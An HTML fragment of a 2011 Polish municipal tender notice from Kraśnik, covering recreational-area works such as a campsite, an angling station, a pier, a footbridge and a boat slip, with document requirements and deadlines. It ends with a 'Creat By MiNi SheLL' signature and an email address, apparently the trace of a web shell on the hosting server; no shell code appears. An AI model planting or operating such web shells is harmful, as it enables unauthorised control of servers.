<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie informacje zawarte są w projekcie umowy stanowiącym załącznik nr 6 do niniejszej SIWZ.
2.. Wykonawca może wnosić o przedłużenie czasu wykonania umowy, jeżeli ma opóźnienia lub może być opóźniony w wykonaniu robót z powodu następujących okoliczności:
	wyjątkowo niesprzyjających warunków atmosferycznych,
	niedopełnienia przez Zamawiającego jego obowiązków wynikających z umowy,
	przerwania lub zawieszenia robót z przyczyn nie zawinionych przez Wykonawcę,
	poleceń wydawanych przez Inspektora Nadzoru mających wpływ na termin wykonania lecz nie wynikających z uchybień Wykonawcy,
	działania nieprzewidziane sił natury.
Wysokość wynagrodzenia Wykonawcy może ulec zmianie w razie zajścia okoliczności, których nie można było przewidzieć w chwili składania oferty i zawarcia umowy oraz w razie ustawowej zmiany stawek podatku VAT, stawek celnych lub innych opłat urzędowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lublin.pl/miastokrasnik/index.php?id=85<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
p. 321.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2011 godzina 11:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 22.03.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zagospodarowanie terenu rekreacyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1) Zagospodarowanie terenu campingu 
Zadanie nr 2) Budowa stanicy wędkarskiej - wraz z przyłączami  i zagospodarowaniem  terenu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.23.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Infrastruktura nabrzeża.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3)  Budowa molo 
Zadanie nr 4)  Budowa ciągu pieszo-rowerowego wraz z kładką na rzece Wyżnicy
Zadanie nr 5)  Slip do wodowania łodzi  i stanowisko do poboru wody na cele  p .poż..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8, 45.23.32.60-9, 45.24.13.00-1, 45.24.42.00-1, 44.21.21.00-0, 44.21.21.20-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com